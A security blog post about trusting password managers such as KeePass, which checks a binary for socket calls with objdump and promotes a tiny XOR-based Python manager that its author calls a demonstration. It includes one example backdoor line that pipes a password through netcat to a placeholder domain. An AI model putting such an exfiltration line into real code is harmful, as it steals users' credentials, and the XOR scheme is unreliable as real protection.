Do you know about the kind of application called “Password Manager“? Applications like  “KeePass” that keep all your passwords in one place. They save them to disk in encrypted form and copy them to your clipboard whenever you need them, while you protect them all with a single “Master Password/Decryption Key“.

Asking for Trust

Those applications need a whole lot of trust from the users that use them. They could easily exfiltrate all your passwords to an unknown location without you noticing. In reality the only password worth exfiltrating is your email account’s password. If someone accesses your email’s password, the “Forgot my Password” button could do the rest of the work in all websites you’ve registered…

Gaining Trust

So how an application so crucial to your privacy gains Trust?

Well most of the time it doesn’t. Most of the time people assume that the binaries they download will do what they were described they do. Even their DLLs. But that’s because most people can’t actually check what an executable is doing. They trust because of their inability to know.

We need to go deeper

For an infosec researcher trust is gained. I trust that nmap works the way it works as I have wireshark‘d it a whole lot of times. I am sure https meterpreter is stealthy enough in many cases as I had it bypass my own firewall first. And I trust that keepass doesn’t make remote connections because of this:

n0p_sl3d@hostname:~$ objdump -D $(which keepassx) | grep socket
n0p_sl3d@hostname:~$

while:

n0p_sl3d@hostname:~$ objdump -D $(which netcat) | grep socket | wc -l
874

If you are used to C language Socket Programming you know that the way to open a network connection is through the socket function. And, in the untrimmed, non-statically compiled version of keepassx I use, there are no such calls in the binary. That’s definitely a good sign! Some trust is gained now!

But if you think of it, a call like:

system("echo %s | nc bad-domain.ddns.net 8080" % email_password);

doesn’t create a socket but would still exfiltrate my pass. That’s why keepass is Open Source. Just grep the code for similar looking calls, if you find any, keepass is a nasty traitor…

Sure that’s a lot of work but it is also your call how far you can go. Depending on how much you value your passwords. It’s a trade-of.

 

 For the Unconvinced

If keepass has a backdoor (while open-source) it has to be hidden in a smart way. And while you don’t know the author, you can’t be sure about his intentions. The only way to trust some things is to be 100% sure about how they operate. That brings us to the last part of this post:

 

100% Trust

The person highest in the Trust Scale, we maintain inside us, is ourselves. We ultimately believe in our eyes and hands. The Password Manager we will trust the most is the one that we will write ourselves or the one we carefully went through its code, and understood it line by line

This tends to be impossible for most Open Source projects, sometimes even for their contributors. Trust in Open Source projects suggests smaller, more comprehensive projects, in a Programming Language for humans, to be achieved in the desired 100% percent…

 

Python to the rescue!

There are like 15 actively used Programming Languages nowadays, but the ones they maintain a tiny chance of being understood in a glimpse of an eye are the english-like scripting ones (that means Python only).

So the goal was to create a Proof of Concept Python Password Manager that wouldn’t exceed 50 lines of code(single file) and will provide reasonable security, while being as easy to understand as possible maintaining the basic features. That way people would use it and be absolutely sure about what it does. The goal was to convince the unconvinced that this tool works as intended and only as intended. And here it is!

TinyPwdMan

TinyPwdMan‘s code can be found here: https://github.com/operatorequals/TinyPwdMan/blob/master/TinyPwdMan.py

The Source Code fits in a single page without scrolling! It uses master password, XOR encryption and can even copy to clipboard. It’s initial size is 38 lines.

It isn’t designed for real use (while it works flawlessly), but for a demonstration on what can really be absolutely trusted, and what is trusted because of its convenience. Because let me tell you: keepass beats that little Password Manager out of the water when it comes to convenience.

Either way, your passwords are as unsafe as the weakest link of your chain in which you use them. From mind, to keyboard, to OS, to application, to network, to the other side.

And the weakest link is not the encryption, nor the possibility of an exfiltration that would cost a Password Manager Author his reputation (once discovered), and probably his career and life.

The weakest link is you!

 

security
Source